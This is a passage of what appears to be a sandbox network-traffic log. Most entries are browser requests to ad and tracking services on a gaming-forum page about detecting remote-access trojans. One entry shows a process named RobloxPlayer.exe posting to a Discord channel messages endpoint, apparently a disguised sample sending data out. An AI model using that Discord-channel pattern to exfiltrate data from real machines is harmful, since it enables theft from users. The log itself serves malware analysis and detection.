AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gpp=&gpp_sid=
178.250.1.11:443

https://gum.criteo.com/sid/json?origin=prebid&topUrl=https%3A%2F%2Fwww.se7ensins.com%2F&domain=www.se7ensins.com&cw=1&lsw=1&us_privacy=1---&gdprString=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1

tls, http2

firefox.exe

3.1kB
6.2kB
17
17

HTTP Request

GET https://gum.criteo.com/sid/json?origin=prebid&topUrl=https%3A%2F%2Fwww.se7ensins.com%2F&domain=www.se7ensins.com&cw=1&lsw=1&us_privacy=1---&gdprString=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1

HTTP Response

200
162.19.138.83:443

https://id5-sync.com/api/config/prebid

tls, http2

firefox.exe

2.0kB
4.3kB
15
18

HTTP Request

POST https://id5-sync.com/api/config/prebid

HTTP Response

200
34.120.133.55:443

https://api.rlcdn.com/api/identity/envelope?pid=106&ct=4&cv=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

tls, http2

firefox.exe

3.0kB
7.8kB
16
20

HTTP Request

GET https://api.rlcdn.com/api/identity/envelope?pid=106&ct=4&cv=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA
44.197.96.190:443

idx.liadm.com

tls

firefox.exe

3.1kB
6.6kB
14
15
52.223.40.198:443

match.adsrvr.org

tls

firefox.exe

4.4kB
10.8kB
14
19
178.250.1.11:443

https://gum.criteo.com/sid/json?origin=prebid&topUrl=https%3A%2F%2Fwww.se7ensins.com%2F&domain=www.se7ensins.com&cw=1&lsw=1&us_privacy=1---&gdprString=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1

tls, http2

firefox.exe

3.0kB
5.1kB
15
17

HTTP Request

OPTIONS https://gum.criteo.com/sid/json?origin=prebid&topUrl=https%3A%2F%2Fwww.se7ensins.com%2F&domain=www.se7ensins.com&cw=1&lsw=1&us_privacy=1---&gdprString=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1

HTTP Response

200
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

1.2kB
2.9kB
10
10

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
130.211.23.194:443

https://api.btloader.com/pv?tid=ndz7IVwaO&w=5756214799499264&o=5714937848528896&cv=2.1.44-1-g797e4b1&widget=false&checksum=16b5899b&r=false&vr=1280x552&pageURL=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&sid=ffMWAjZas&c=true&pm=false&upapi=true

tls, http2

firefox.exe

2.3kB
6.7kB
18
23

HTTP Request

GET https://api.btloader.com/mw/state?bt_env=prod

HTTP Request

GET https://api.btloader.com/country?o=5714937848528896

HTTP Request

GET https://api.btloader.com/pv?tid=ndz7IVwaO&w=5756214799499264&o=5714937848528896&cv=2.1.44-1-g797e4b1&widget=false&checksum=16b5899b&r=false&vr=1280x552&pageURL=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&sid=ffMWAjZas&c=true&pm=false&upapi=true
34.160.152.31:443

https://c.pub.network/v2/c

tls, http2

firefox.exe

3.0kB
6.3kB
16
21

HTTP Request

POST https://c.pub.network/v2/c
34.160.152.31:443

https://c.pub.network/v2/c

tls, http2

firefox.exe

1.7kB
6.0kB
12
11

HTTP Request

OPTIONS https://c.pub.network/v2/c
3.162.148.221:443

https://aax.amazon-adsystem.com/e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=5&ws=1280x552&v=24.506.1519&t=2000&slots=%5B%7B%22id%22%3A%22aps_springserve_outstream_ron%22%2C%22mt%22%3A%22v%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&vm=%7B%22ids%22%3A%7B%22audigent%22%3A%22%257B%2522hadronId%2522%253A%25220001yum0eabfdiledfja6b687lg8falbdjeell6ekeabackkc2jl%2522%257D%22%2C%22id5%22%3A%22ID5*NQlRTNx5ZAOqP9LwA08SRcb8Mr7g4fEqc01CjXERBsSiBZ8tjCSWgJ-p-RSuQIqIodhIfg7Ia1JeC8s91KiYAaHJ1hOpW0boy51YONBr1jOh_BQOsbSLXytHAYBhLKF7od0OoZ_NbUtIj-xihNMF9qHtT5rjlhxelqvFrRUfFhejTj2EwoWIH32-rRGt8SHAog8u3wwyYUaDV24frJbb0w%22%2C%22pubcommon%22%3A%22a56c6a5c-fb27-451e-90d1-520be70f2f04%22%7D%7D&_c=1

tls, http2

firefox.exe

13.4kB
23.6kB
27
37

HTTP Request

GET https://aax.amazon-adsystem.com/e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=0&ws=1280x552&v=24.506.1519&t=543&slots=%5B%7B%22sd%22%3A%22se7ensins_970x90_728x90_320x50_Sticky%22%2C%22s%22%3A%5B%221x1%22%2C%22300x50%22%2C%22320x50%22%2C%22468x60%22%2C%22728x90%22%2C%22970x90%22%2C%22300x100%22%2C%22320x100%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_970x90_728x90_320x50_Sticky%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&_c=1

HTTP Request

GET https://aax.amazon-adsystem.com/e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=1&ws=1280x552&v=24.506.1519&t=543&slots=%5B%7B%22sd%22%3A%22se7ensins_970x250_970x90_728x90_320x100_320x50_ATF%22%2C%22s%22%3A%5B%22468x60%22%2C%22728x90%22%2C%22970x90%22%2C%22300x250%22%2C%22970x250%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_970x250_970x90_728x90_320x100_320x50_ATF%22%7D%2C%7B%22sd%22%3A%22se7ensins_300x250_320x100_320x50_incontent%22%2C%22s%22%3A%5B%22300x250%22%5D%2C%22s